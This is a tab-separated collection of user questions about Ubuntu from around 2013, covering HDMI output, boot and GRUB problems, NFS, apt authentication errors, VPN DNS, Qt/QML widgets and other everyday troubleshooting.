307468	intel hd4000 hdmi and ubuntu 13.04	any ideas what can i do in order to get hdmi output in ubuntu 13.04 ? i have an integrated intel hd4000 card . it is very frustrating that this basic function still does n't work.. this is the output of xrandr : 530u3c-530u4c : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1366x768 60.1*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
307472	ubuntu 13.04 booting problem	i have a dell inspiron 3521 laptop , core i3 with 4gb ram , and a 500 gb hard drive . i tried to install ubuntu 13.04 from a usb , alongside windows 7 . everything went fine and it said restart now to finish . i restarted the laptop and only windows shows up , and more than 100 gb of the hdd is gone . please can someone help me get ubuntu booting ?
307473	installng ubuntu control center prompts me with a debconf prompt	since every installation guide uses ubuntu control center and i 'm not such an expert with ubuntu yet , i figured it might be a lot easier to go through any tutorial if i have ucc myself . so i went to see how to get ucc . i added the ppa in my software sources and i used the terminal to get and install it ucc . after installation i get asked something but i do n't really get what 's being asked here nor what i have to select . can anyone tell me what the ./lircd.conf file exactly contains ? and also what would be the best option to choose here ? a quick answer will be appreciated !
307482	my chromium decides to start up each time i boot up computer	after installing few games from humble bundle onto my computer , i noticed my chromium web browser started to act funny by starting up without being clicked . i reinstalled it , but the issue is not fixed . can anyone suggest on what i can do next ? update : i looked at startup applications settings and i did not find chromium there .
307483	port 111/tcp open and rpcbind running on nfs server but invisible on nfs client	i am setting up an nfs sevrer on ubuntu 12.04 lts server . running nmap server-ip on the sever gives me : port state service 22/tcp open ssh 111/tcp open rpcbind 2049/tcp open nfs which seems to indicate the nfs server runs but on the client , doing the same gives me port state service 22/tcp open ssh 5631/tcp filtered pcanywheredata the firewall ( ufw ) is disabled on the server and client . because of this i ca n't mount my exported folders on the client . any idea what avoids my client to see port 111 open ?
307484	any way to change bluetooth folder ?	i 'm looking to change the default bluetooth received files directory in /home/user/public . is there a dconf key or some other way to change it ?
307487	quantum gre or vlan ?	i am researching openstack quantum with open vswitch , and am wondering if someone can answer this question for me : when should i choose gre or vlan for the networking and what pros and cons will i have in using one of them compared to the other ?
307491	how much ram does ubuntu need to run	well i have an old emac and i wanted to replace the operating system with ubuntu but i don '' t want to break it .
307496	which archive format does not read/extract whole archive when extracting single file ?	as the title states , i have a few large archives ( currently in .7z and .tar.gz format ) stored on a remote location which i access via sshfs . i often find myself needing to extract one or two files from these archives and the default archive manager in ubuntu seems to extract/read the whole file in the background first before i get the file i want . i 'd like a list of the possible formats that does not do this . in other words , i 'd like to be able to extract a file from a large archive without any delay .
307504	how to replace centos 's grub with ubuntu 's grub	i ca n't boot into ubuntu 12.04 just centos . how should i do to revert back ubuntu grub ?
307505	delete files to trash	ubuntu 13.04 dual-booting next to pre-installed win 8 . i can only delete files to the trash can when i am in the home directory , even for files which belong to me ( usually inside /var/www ) . selecting the file in nautilus and hitting delete does nothing . right clicking and selecting delete asks me if i want to delete permanently . here 's what i know : these are files owned by me . /var is owned by root , but www ( and all files within ) are owned by me . i have a trash folder at /home/ ( name ) /.local/share/trash ; it seems to work fine for files i want to delete from my home directory . this machine was a win 8 machine which gave me a lot of trouble getting ubuntu to run alongside on ; i am not sure if this is an issue . when i created the partitions , i made a home partition separate , so i am thinking this is probably my problem . here is my fstab . this blog post looked like the exact problem i have , but i am not experienced enough with fstab to get this to work . i tried adding my uid to / : uuid=bb3ada65-be09-4b18-b091-9b3c95534cfd / ext4 errors=remount-ro , uid=1000 0 1 but then fstab could n't load when i rebooted , and i had some trouble getting my system to load back up - do n't really want to experiment with this since it takes so much time just to try something out . edit : after reading the man for fstab a bit , it looks like uid is an option for fat ; / is ext3 so this is n't the problem , i am guessing . edit2 : my permissions seem fine : cd /var/www touch test\ doc.txt ls -la ... -rw-rw-r -- 1 tom developers 0 jun 12 16:55 test doc.txt ... rm test\ doc.txt notice i do n't need sudo for creating or deleting the file from the cli , nor do i need to be root to delete in nautilus - i just ca n't delete to my trash for some reason .
307508	how to tell if my laptop has uefi	new user here and i would like to know how do i tell if my toshiba satellite laptop a665-s5173 with windows 7 home premium , 64-bit intel core i5 1st generation processor with 4gb of ram has this uefi firmware ? i want to try ubuntu and first run it off a cd before i actually install it to my hard drive , but it tells me if i have this uefi i should download the 64-bit version or otherwise the 32-bit version . also , which version number of ubuntu should i download , 12 , 13 , etc. ? thanks a bunch ! sincerely , sue
307509	upgrade to 12.04lts dumps to busybox on boot	i just upgraded my server from 10.04lts to 12.04 lts using the server upgrade process documented here : https : //help.ubuntu.com/community/preciseupgrades . on boot , i am now dumped to the busybox shell ( more on this in a moment ) . however , if i boot a kernel from the previous release , everything boots fine . the only thing odd about my configuration is that my boot device is a multi-disk device using raid1 . when i get to the busybox shell , typing `` mount /dev/md0 /root '' works just fine . i 've tried passing in rootdelay=30 and i 'm dumped to the shell within 5 seconds of boot . unlike the question marked here : upgraded from 10.04 to 12.04 and grub drops to busybox prompt without error i 've not been booting with the splash or quiet option , and i 've received no complaints about a degraded array . nonetheless , i 've tried booting with the bootdegraded kernel option and this has not worked either . any thoughts on what to try ? ( and yes , the power supply is plugged in : - ) ) config information : grub version : grub ( gnu grub 0.97 ) most grub menu.lst options are commented out ( to use defaults ) . most recent kernel which does n't work : title ubuntu 12.04.2 lts , kernel 3.2.0-51-generic-pae root ( hd0,1 ) kernel /boot/vmlinuz-3.2.0-51-generic-pae root=/dev/md0 ro initrd /boot/initrd.img-3.2.0-51-generic-pae quiet most recent kernel which does work : title ubuntu 12.04.2 lts , kernel 2.6.32-46-generic-pae root ( hd0,1 ) kernel /boot/vmlinuz-2.6.32-46-generic-pae root=/dev/md0 ro initrd /boot/initrd.img-2.6.32-46-generic-pae quiet mdadm information : garrett @ stargate : /boot/grub $ sudo mdadm -- detail /dev/md0 /dev/md0 : version : 0.90 creation time : sat dec 16 22:27:17 2006 raid level : raid1 array size : 57609024 ( 54.94 gib 58.99 gb ) used dev size : 57609024 ( 54.94 gib 58.99 gb ) raid devices : 2 total devices : 2 preferred minor : 0 persistence : superblock is persistent update time : mon sep 2 17:02:27 2013 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : 5c92f0d9:9cf5be95:03611c5e : a540b92f events : 0.24172972 number major minor raiddevice state 0 8 18 0 active sync /dev/sdb2 1 8 2 1 active sync /dev/sda2 md device data as seen by the kernel : garrett @ stargate : ~ $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sda2 [ 1 ] sdb2 [ 0 ] 57609024 blocks [ 2/2 ] [ uu ] unused devices : < none >
307514	how to turn on and start openstack and openvswitch on a single machine ?	i have a 32-bit version of ubuntu 13.04 running in my desktop . my intention is to turn on and start both openstack and openvswitch in my desktop , such that i could get some practical experiment out of operating the twos . i just do not know how to turn them on and configure them , could you please provide me with pointers to articles , which explain how these are supposed to be done correctly ?
307529	screen resolution issues	so i just installed ubuntu on my new computer and i 'm using a tv monitor for a screen and the resolution is way off . i went through the resolution settings and none of them are right . i also went into the terminal to change it but none of those work either . advice would be much appreciated .
307531	how can i get rhythmbox to support 7th gen ipod nano ?	i recently purchased a 7th generation ipod nano , and i try to get it to sync to rhythmbox , but it only supports ipod nano up to 6th gen , and i do n't know how to change that . i tried upgrading my distribution from 12.10 to 13.04 , but it turns out that my distro was not the issue ? is there perhaps an update for rhythmbox that fixes this ?
307534	unable to su with root : `/bin/bash : permission denied`	root @ frankfurt : ~ # sudo adduser newuser adding user `newuser ' ... adding new group `newuser ' ( 1001 ) ... adding new user `newuser ' ( 1001 ) with group `newuser ' ... creating home directory `/home/newuser ' ... copying files from `/etc/skel ' ... enter new unix password : retype new unix password : passwd : password updated successfully changing the user information for newuser enter the new value , or press enter for the default full name [ ] : new room number [ ] : work phone [ ] : home phone [ ] : other [ ] : is the information correct ? [ y/n ] y root @ frankfurt : ~ # su newuser can not execute /bin/bash : permission denied root @ frankfurt : ~ # thanks .
307538	which is the light one ? openbox or icewm for ubuntu 12.04 lts ?	which is the light one ? openbox or icewm for ubuntu 12.04 lts ? i want to install on ubuntu lts , and i really need it because the hardware accelerate of unity 3d make my battery drain faster on asus a43s
307540	network connectivity on xubuntu 13.04 lost	i recently upgraded from xubuntu 12.10 to 13.04 and not long after ( though not immediately after ) i have lost network connectivity . sometimes i can ping 8.8.8.8 and sometimes i ca n't . i ca n't ever ping www.google.com or www.gnu.org . i 've confirmed that the problem is not with my dsl bridge/router , since i have normal internet access on my other xubuntu machine and via wireless ( from the dsl router ) with my android device . here 's what i 've tried on the xubuntu 13.04 system , all to no avail . first my system and ifconfig output while on a wired connection : $ uname -a linux cypher 3.8.0-23-generic # 34-ubuntu smp wed may 29 20:22:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ ifconfig eth1 link encap : ethernet hwaddr 00:90 : f5 : d8:8e:6a inet addr:192.168.254.27 bcast:192.168.254.255 mask:255.255.255.0 inet6 addr : fe80 : :290 : f5ff : fed8:8e6a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:914 errors:0 dropped:0 overruns:0 frame:0 tx packets:343 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:61498 ( 61.4 kb ) tx bytes:32037 ( 32.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:336 errors:0 dropped:0 overruns:0 frame:0 tx packets:336 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:54571 ( 54.5 kb ) tx bytes:54571 ( 54.5 kb ) vmnet1 link encap : ethernet hwaddr 00:50:56 : c0:00:01 inet addr:192.168.254.1 bcast:192.168.254.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:54 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vmnet8 link encap : ethernet hwaddr 00:50:56 : c0:00:08 inet addr:172.16.145.1 bcast:172.16.145.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : fec0:8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:55 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i have vmware player and virtualbox installed , though neither is running at the time . i did have to reinstall vmware player and have it recompile itself against the latest kernel after the 13.04 upgrade . that also involved blacklisting kvm and kvm_intel in /etc/modprobe.d/blacklist.conf ( which i 've since unblacklisted ) . not sure if that 's relevant . attempt to ping : root @ cypher : ~ # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=48 time=37.9 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=48 time=37.2 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=48 time=36.8 ms ^c -- - 8.8.8.8 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 36.807/37.327/37.906/0.477 ms root @ cypher : ~ # ping www.google.com ping www.google.com ( 74.125.139.105 ) 56 ( 84 ) bytes of data . ^c -- - www.google.com ping statistics -- - 9 packets transmitted , 0 received , 100 % packet loss , time 7999ms root @ cypher : ~ # ping 74.125.139.105 ping 74.125.139.105 ( 74.125.139.105 ) 56 ( 84 ) bytes of data . ^c -- - 74.125.139.105 ping statistics -- - 10 packets transmitted , 0 received , 100 % packet loss , time 9071ms so i can reach dns , but not anything else . i 've rebooted many times . i tried : sudo dpkg-reconfigure resolvconf and rebooted . no joy . i tried settings manager > network connections > wired connection 1 > ipv4 settings and set method to `` automatic ( dhcp ) addresses only '' and set dns servers to 8.8.8.8 , 8.8.4.4 i tried restarting networking with both : sudo service networking restart sudo ifup eth1 neither fixed the issue ( including after rebooting ) . my /etc/network/interfaces looked like this : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback i changed it to : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto eth1 iface eth1 inet loopback did n't seem to make a difference . rebooted . still not working . then i unplugged the wired connection and tried the wireless . i can connect to the wireless router . i can not ping dns nor www.google.com . nor can i log onto the internal web interface of the router ( browser just hangs waiting for a connection to it . ) not sure what else to try or if i should undo anything done above . i do n't know what happened to eth0 . i thought that 's what i 'd been using for the past 6 months on this system , so not sure how it changed to eth1 and if that is the problem . ideas ?
307541	how to change history size for ever ?	the default size of history in ubuntu is 1000 but it 's too narrow , i want to change it to 10000 , so i append export histsize=10000 export hisefilesize=10000 to .bash_profile ( it actually is .profile in 12.04 ) , and 'source ' it source .profile then i input echo $ histsize echo $ histfilesize 1000 was displayed for both , but i reboot my computer it went 'default' how it does n't work ?
307542	system monitor and free do n't say the same	i use system monitor to check free ram : but free do n't say the same : tuankiet65 @ ubuntupc : ~ $ free total used free shared buffers cached mem : 8092368 7666932 425436 0 444560 3309676 -/+ buffers/cache : 3912696 4179672 swap : 8370172 537836 7832336 so , which one is correct ? system monitor or free ?
307547	downgrade from 13.04 to 12.04	i own an hp 2000 laptop . it did not come with a recovery cd , only a recovery partition that i destroyed when i first installed 12.04 . i could not get the computer to recognize any cd at that point in the startup . i later made a disc of 13.04 and the computer did recognize that , so i installed it . i do not like 13.04 and would like to install 12.04 over everything and then install windows 7 in a partition to play the old republic . i can not get my computer to recognize the 12.04 disc or the windows 7 disc at boot . it will only recognize the 13.04 disc . in 13.04 i can not find a startbar where i can see all applications that i have on my computer .
307563	why am i getting 'package can not be authenticated ' errors for google-chrome ?	my precise machine was previously working fine , but now when i update from update-manager or the terminal i get an error about being unable to authenticate google-chrome .
307565	ca n't write files to a newly formatted drive	i cfdisked and formatted a secondary hard drive . it is listed and mountable but i am unable to write files to it . can someone tell me if i missed a step ?
307566	wget and curl somehow modifying bencode file when downloading	( this is a copy from my post on stack overflow i am hoping someone in the ubuntu community can shed some light on the situation for me ) okay so i have a bit of a weird problem going on that i 'm not entirely sure how to explain ... basically i am trying to decode a bencode file ( .torrent file ) now i have tried 4 or 5 different scripts i have found via google and s.o . with no luck ( get returns like this in not a dictionary or output error from same ) now i am downloading the .torrent file like so wget http : //link_to.torrent file //and have also tried with curl like so curl -c - -o http : //link_to.torrent and am concluding that there is something happening to the file when i download in this way . the reason for this is i found this site which will decode a .torrent file you upload online to display the info contained in the file . however when i download a .torrent file by not just clicking on the link through a browser but instead using one of the methods described above it does not work either . so has anyone experienced a similar problem using one of these methods and found a solution to the problem or even explain why this is happening ? as i can ; t find much online about it nor know of a workaround that i can use for my server update : okay as was suggested by @ coder543 to compare the file size of download through browser vs. wget . they are not the same size using wget style results in a smaller filesize so clearly the problem is with wget & curl not the something else .. idea 's ? for one specific link wget methood - > 7281 bytes curl method - > 7281 bytes download- > 7317 bytes also note curl and wget seem to be the same on atleast the 3 or 4 i have compared ( and this has been tested with multiple different .torrent links ) again any help or idea 's to move forward would be greatly appreciated ! even if anyone can reproduce the reults it would be appreciated ! ... my server is 12.04 lts on 64-bit architecture and the laptop i tried the actual download comparison on is the same
307569	trailing windows after installing gnome shell !	i am running 13.04 on this computer , and was interested in installing the gnome shell alongside unity . i followed the instructions on this link : http : //www.itworld.com/software/358052/install-gnome-shell-38-ubuntu-1304 the gnome shell started working fine , but when i switched back to unity once to check on some printer driver problem , i encountered this graphic problem : everything you do on the desktop kind of gets `` imprinted '' on it , even after you 've closed the window ! moreover , when you drag a window , the entire trail remains . i did n't know where to classify this problem , or how to search for a similar problem , so i posted a new question . please help me out !
307573	how do i restore the default ubuntu sound effects	how do reinstall default ubuntu sound effect , when like the volume when it goes bloop for example when i turn the volume up ? because i changed my settings accidentally but i do n't know how to return it back to default . thanks in advance
307575	how to install ubuntu in a external hard drive ?	i already know how to make a bootable flash drive . my question kind of involves this . i would love to make a portable hard drive with the bootable version of ubuntu on it and be able to save my files and settings to the same hard drive . so in short when i plug it into computer a and make a word document i would like to save it to the desktop and then when i plug it into computer b the file is there on the desktop , along with my other settings . i would like if i could do that with any computer i can boot ubuntu on too . if anyone knows how to make this would i would be extremely happy if you could help me out with this . i am new to linux and do n't know too much so if you could explain it to me like i am 5 years old i would appreciate it .
307576	mysql server backup using copying database files	i want to backup mysql databases to another new server . i do n't want to use mysql replication and mysqldump for backup as they are using higher cpu and higher i/o on server . i tried mysqlhotcopy to send databases files to another server into /var/lib/mysql/database but after backup new server shows empty database . help me friends to find solution . is there any way to send database raw files using rsync or scp and get recovered database ?
307582	how to detect the number of usb devices picking up video	please help . if i have multiple devices connected via usb to my computer , is it possible to detect which of those devices are web cameras and count them ?
307583	installing ubuntu the easy way	how do i get rid of windows 8 and install ubuntu i have a boot disc that work before but it is not working this time and windows 8 is not for me and is not letting me load the boot disc for ubuntu
307585	problem in evolution @ ubuntu 12.04 lts	recently i have installed 12.04 lts from 10.04 . after installing & configuration of evolution , i am getting 2 errors . after sending mails to i am getting your message was sent , but an error occurred during post-processing . the reported error was `` failed to append to mbox : ///home/bsm/.local/share/evolution/mail/local # sent : invalid folder uri 'mbox : ///home/bsm/.local/share/evolution/mail/local # sent' appending to local 'sent ' folder instead. '' . after installing ubuntu 12.04 lts & evolution , i am not seeing any .evolution folder in home so that takeup the backup is there any advice to overcome these problems
307587	ca n't chown mounted hdd under sudo	i recently installed ubuntu 13.04 in another attempt to drop away from windows , and am having an issue with my two hdds . i 've gone through the entirety of this tutorial very carefully , but i think either it , or i , am missing something . https : //help.ubuntu.com/community/installinganewharddrive whenever i try to either chown the hdd mounts to me , or create a folder , i get a permission error . i 've tried to chown it via 'sudo nautilus ' and 'sudo chown -r bozotheclown : /media ' to no effect . here 's my terminal log . bozotheclown @ bozotheclown-ms-7759 : ~ $ sudo chown -r bozotheclown : /media chown : changing ownership of ‘/media/hdd2’ : operation not permitted chown : changing ownership of ‘/media/hdd1/.trash-0/info/gfvn.trashinfo’ : operation not permitted chown : changing ownership of ‘/media/hdd1/.trash-0/info’ : operation not permitted chown : changing ownership of ‘/media/hdd1/.trash-0/files/gfvn’ : operation not permitted chown : changing ownership of ‘/media/hdd1/.trash-0/files’ : operation not permitted chown : changing ownership of ‘/media/hdd1/.trash-0’ : operation not permitted chown : changing ownership of ‘/media/hdd1’ : operation not permitted bozotheclown @ bozotheclown-ms-7759 : ~ $ mkdir /media/hdd1/sf mkdir : can not create directory ‘/media/hdd1/sf’ : permission denied bozotheclown @ bozotheclown-ms-7759 : ~ $ sudo ! ! sudo mkdir /media/hdd1/sf bozotheclown @ bozotheclown-ms-7759 : ~ $ ls /media/hdd1 sf bozotheclown @ bozotheclown-ms-7759 : ~ $ sudo nautilus bozotheclown @ bozotheclown-ms-7759 : ~ $ any advice ?
307589	can not install google chrome - package can not be authenticated	i have a puppet setup which adds the google package signing key , the google repo and then tries to install google-chrome-stable . it has been working fine on many servers for the past 6 months until today when it just broke . here are steps to repro ( on ubuntu 12.04.2 ) ~ $ wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add ~ $ echo deb http : //dl.google.com/linux/chrome/deb/ stable main | sudo tee /etc/apt/sources.list.d/google.list ~ $ sudo apt-get update ~ $ sudo apt-get install -y google-chrome the repo is the exact same key and repo that gets added when you manually install the .deb from google , i 'm not sure why i ca n't install it without the following errors now coming up : ~ $ sudo apt-get install -y google-chrome-stable reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libwmf0.2-7 libilmbase6 libcdt4 libpathplan4 libopenexr6 libdjvulibre21 libgraph4 libdjvulibre-text use 'apt-get autoremove ' to remove them . the following new packages will be installed : google-chrome-stable 0 upgraded , 1 newly installed , 0 to remove and 46 not upgraded . need to get 41.9 mb of archives . after this operation , 160 mb of additional disk space will be used . warning : the following packages can not be authenticated ! google-chrome-stable e : there are problems and -y was used without -- force-yes i 'm aware that i can force the install but the point is - why has it changed ? it used to not complain about this .
307590	display execution of boot script	i have on the order of 1000 experiments i 'd like to run on a modified version of the 3.10 kernel ( with ubuntu 12.10 ) . after every experiment , the machine needs to be rebooted . i 've written a ruby script to do this . i made the script a boot script ( in /etc/init.d ) so that the user does not need to login or authenticate as root and the script can run without intervention . is there a way to display the output of a boot script while it is executing ? i 'd like to be able to monitor the status of the experiments or give instructions to the user ( press any key to stop , etc ) . i 'm imagining something like a terminal in place of the ubuntu boot screen with the five little lights , but i 'm not really sure what 's possible .
307603	configure nat in ubuntu 12.04	i want to configure nat for my network of 10 computers so that the data is transmitted via a single pc . can anyone give a good tutorial for it ?
307604	what tool can i use to monitor a network of pcs ?	i want my system to act as the central system for the rest of my network of 10 pcs . i also want to monitor what 's going on , and monitor the activity of other systems . so how can i do this ? what are the tools i need to monitor ; just using top or any bandwidth monitoring tool is the only thing required , and how can i use my system as a centralized server for rest of the systems ?
307606	is there any offline application for kanban or trello ?	are there any offline applications that support or work with trello ? also , is there any offline tool that performs a similar function ( kanban ) ?
307614	ubuntu 13.04 installation alongside win 7	i have win 7 already installed and i want to install ubuntu 13.04 alongside it . i read over the net how to do so . now while installing when i select something else in the install ubuntu menu , there i should see a free space that i managed by shrinking a volume by 45 gb . but it did n't show that free space . now my win 7 has partitions like this but in ubuntu installation it shows a partition of win loader of 1 mb , one partition of 100 mb , 1 of 50 gb and 1 of 250 gb . please help me out in this..
307620	will gwibber be fixed to work with new twitter api	will gwibber be fixed to work with new twitter api as it was official twitter client for 12.04 lts , or should we search for the twitter client that works with new api ? the fix is here https : //bugs.launchpad.net/ubuntu/+source/gwibber/+bug/1190575
307622	update pidgin using apt-get	how do i update only pidgin using apt-get ? i tried > sudo apt-get update pidgin but i get > the update command takes no arguments
307628	how to configure ffmpeg from some build ?	i 'd like to ask if there is a option for rebuilding or reconfiguring ffmpeg from any repository . 'cause i need to add libass , but there 's no build with this library and i used ffmpeg from jon severisson 's ppa when i had 12.10 but now i 've upgraded to 13.04 and it is n't supported . so , is there any other option to install ffmpeg without compiling from source ?
307629	installation directory of thunderbird	i want to lock the settings to use by user so that i find my thunderbird installation directory but i could n't . please help me and tell me the installation directory of thunderbird in ubuntu 12.04 .
307630	problem burning dvd with some data already on it	i have a dvd that has some data on it ( about 7 mb ) . i want to add further data to it but ubuntu wo n't allow it . it shows 0 bytes used and 0 bytes available when i go into properties of the dvd and i am not able to burn additional data to it . the error message shown is insufficient disk space . the data on the disk was earlier written using windows , could that be a problem ? i have about 10 more disks that have negligible data on them and want to use them for storing other data . what should i do ?
307633	xubuntu/precise : default programs chaos	i 'm using xubuntu `` precise '' . i have set up my preferred applications ( settings/preferred-applications or $ exo-preferred-applications ) : web browser : chromium mail reader : thunderbird file manager : thunar terminal emulator : xfce4-terminal however , some programs have their own ideas : clicking the terminal icon in the xfce panel opens xfce4-terminal but thunar 's `` open terminal here '' opens nextstep terminal . clicking a link in thunderbird or the terminal opens it in chromium , clicking a link in a pdf in evince fails with `` failed to execute child process `` /opt/google/chrome/google-chrome '' ( no such file or directory ) '' . clicking a link in openoffice opens firefox whereas alpine prefers to open links in epiphany . `` open containing folder '' in evince fails with `` failed to execute default file manager - failed to execute child process `` /usr/bin/thunar '' ( permission denied ) . '' ( doubly odd as said application exists and runs fine on the command line . ) other programs prefer to launch nautilus instead . what settings to i have to set so that every application that needs a browser/terminal/file manager uses the correct one ? getting evince to open hyperlinks correctly and thunar my xfce terminal are my priorities , everything else would be nice .
307643	no desktop after using janitor in ubuntu tweak	after using janitor in ubuntu tweak in my ubuntu 13.04 and after restarting there is nothing , no top panel no dock and no left launcher . is there any way get them back ? plz help me guy otherwise i have to install ubuntu once again .
307651	block all torrent traffic via dansguardian	i was wondering how to block all torrent traffic via dansguardian
307652	theme is broken in some places	i am using a computer that started out on 11.10 . i have since updated it several times , and installed and used a great number of wms ( unity , xfce , gnome , kde , cinnamon ) . i am not sure how , but somewhere along the way ( probably when i upgraded to ubuntu 13.04 ) , some parts of my desktop theme were broken . i have tried switching themes and installing new themes , but that does not work . neither did a removal of ( and log out/login cycle ) the ~/.config/dconf folder work . specifically : on several menus , the central part of a button icon is a `` grey square '' that does n't fit in with the theme ( picture below ) . the window and desktop right click menus looks ugly . the same kind of grey field covers the items , and the square checkbox looks weird ( just filled with a uniform blue ) . the separator is a thick line that looks out of place . it seems to be a similar problem to that of window buttons ( picture below ) .
307661	changing text on a popover	i am trying with no success to show a popover with a different text than the one it was declared initially . here is a minimal example : what i would need is to set the text property of the message label just before showing it in onclicked import qtquick 2.0 import ubuntu.components 0.1 import ubuntu.components.listitems 0.1 as listitem import ubuntu.components.popups 0.1 rectangle { color : `` grey '' width : units.gu ( 30 ) height : units.gu ( 30 ) item { component { id : popovermessage popover { id : popover //property alias text : message.text label { id : message anchors { centerin : parent } text : `` text '' fontsize : `` large '' } } } button { id : popoverbutton text : `` open '' onclicked : { popuputils.open ( popovermessage , null ) } } } }
307662	resolvconf is ignoring domain-names received by dhcpclient	my workstation is connected to a network which uses dhcp for ip-configuration . i 'm running 12.04 which is using /etc/network/interfaces for the network configuration . for eth0 i have : auto eth0 iface eth0 inet dhcp almost everything works fine . the only problem is that resolvconf is not taking into consideration the default domain provided by the dhcp-server when generating resolv.conf . i can see in the lease-file ( /var/lib/dhcp/dhclient.eth0.leases ) that the option domain-name `` < my correct domain-names > '' ; is correctly received and when monitoring /etc/resolv.conf while doing a service networking restart i can for some moments see a correct resolv.conf . i assume this is between dhclient has received the information and resolvconf is invoked . what 's going wrong ? is there is configurations switch i need to toggle ?
307663	prevent users from accessing `` system settings ''	i 'm administering a system and do not want people messing with their system settings ( specifically the power settings ) . i 've searched everywhere and can not find a method for disabling the power settings from system settings . the gnome-system-tools package did n't contain any options for restricting access to system settings or power settings . using raring ringtail .
307664	problems with mount command while mounting an image file	i have a local site for accessing data on virtual drives . to do so i created a few directories inside my /var/www/ and a simle html file to access the starting pdf or htm* files on those virtual drives that are intended to be used as local catalogs on cd/dvd . i also must say , file that is being mounted is on a ntfs partition . cd / sudo mount `` /media/video/virtual drives/file.iso '' /var/www/dest_folder first time when i enter it , i get an error that the source location does not exist , but when i use file browser to go to the /media/video/virtual drives/ folder . after the visit command functiones . when i entered all the mount commands manualy that was not a big problem , but now i created a sh script for seven differnt iso files and insterted it in init.d to automaticly start , now i have a problem because the script does not work . ubuntu version is 12.04lts can you help ? regards , saleb
307666	how to add album art to mp3 using vlc media player in ubuntu ?	i want to add album art to any mp3 song . but i do n't know how to do it.my system has vlc media player , umplayer , bashee media player , movie player . how can i add album art to mp3 file using at least any one among those media player ? a screenshot is given below :
307670	access usb flash drive from wine	im trying to use recuva ( a file recovery program ) on wine because some files on a corrupt usb flash drive just did not get restored using photorec for linux . the problem is , i ca n't select the usb flash drive ( /media/ ) folder and thus i ca n't scan . i do n't have access to a windows computer immediately and i must try all possible things to recover the files . how do i permit recuva/wine to access my flash drive ?
307677	constantly check if the virtualbox is started or still booting up from a script	i am writing a shell script to start a virtualbox ( ubuntu ) . after the command i want to put a for loop to keep checking the status of virtualbox and the script comes out of the loop only after the ubuntu is fully started . something like vboxmanage starvm ubuntu for ( i= 0 ; i < 100 ; i++ ) { continue if ( vbox is not on ) } exit when vbox is fully on and execute the next command
307679	how to reboot morethan one remote system ?	i am using ubuntu 10.04 . i need to reboot multiple systems at a time from my ubuntu machine.tell me the way to reboot multiple systems at a time
307680	how to collapse and expand a listitem.standard ?	for the app i am developing i would like to have a list with sections that i can collapse or expand . the item in the sections can be clicked and open a defaultsheet . so , for example in the `` ubuntu ui toolkit gallery '' in the list items tab , in `` groupedlist '' , i would like to be able to click on `` fruit '' and collapse the list , and click again on it and expand the list . how can i do that ? is that possible ? ( it is for listitem.valueselector so it might be possible ) thank you for your help .
307684	how to enable nameserver via vpn	i use vpn ( openvpn ) on ubuntu 13.04 . i see the ip-s through vpn correctly . the problem is , although i configure the nameserver in the network manager i still does n't see the domains . the exported vpn configuration says : comp-lzo yes dev tun proto udp nobind auth-nocache script-security 2 persist-key persist-tun user openvpn group openvpn /etc/resolv.conf says it will be rewritten , so i do n't edit it /etc/network/interfaces contains only : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback i tried editing : /etc/dhcp/dhclient.conf by adding : interface `` eth0 '' { prepend domain-name-servers my.dns.ip.address ; } but it does n't work . how can i solve it ?
307688	how to create iso image from dvd	i want to create an iso image from my bootable dvd . i want to create direct dvd to iso image . please suggest me the right way to create iso image from dvd .
307689	will kubuntu run happily `` out of the tin '' on a netbook ?	i use kubuntu on my desktop and am considering purchasing a new portable . i am thinking of an acer s3-891 ultrabook which runs on an intel i5 3317u . i am aware that some processors for ultrabooks and netbooks have reduced instruction sets , and , whilst they are windows8-friendly , will not necessarily support other operating systems . has anyone experience of running kubuntu on the acer or indeed any laptop with a screen < 14 ins ?
